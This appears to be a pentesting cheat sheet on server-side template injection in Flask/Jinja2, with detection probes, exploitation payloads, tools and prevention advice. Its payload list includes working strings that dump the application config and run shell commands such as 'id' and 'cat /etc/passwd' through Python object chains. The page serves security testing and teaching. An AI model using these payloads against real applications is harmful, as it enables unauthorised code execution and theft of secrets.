Flask Jinja

Overview

Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can inject malicious template directives into a template engine. Unlike XSS which targets the client, SSTI targets the server-side template engine itself, often leading to remote code execution.

Common template engines affected include Jinja2 (Python), Twig (PHP), FreeMarker (Java), and Handlebars (JavaScript).

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Flask Jinja:

{{7*7}}

{{7*'7'}}

{{7|string}}

{{config}}

{{''.__class__.__mro__[1].__subclasses__()}}

{{''.__class__.__mro__[2].__subclasses__()}}

{{''.__class__.__mro__[1].__subclasses__()[<index>]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}

{{lipsum.__globals__['os'].popen('id').read()}}

{{cycler.__init__.__globals__.os.popen('id').read()}}

Tools & Techniques

Recommended tools for Flask Jinja:

• TplMap: template injection detection and exploitation
• Manual detection with {{7*7}} etc.
• Identify template engine with math operations
• Read framework config for secrets ({{config}})
• Escalate to RCE via Python/Java object chains

Prevention & Mitigation

Security recommendations to prevent Flask Jinja:

• Never allow user input in template directives
• Sandbox template engines when user input must be processed
• Use logic-less template engines (Mustache, Handlebars)
• Keep template engines updated to latest versions
• Implement strict input validation and output encoding

References

Additional resources:

• https://portswigger.net/web-security/server-side-template-injection
• https://github.com/epinna/tplmap
• https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection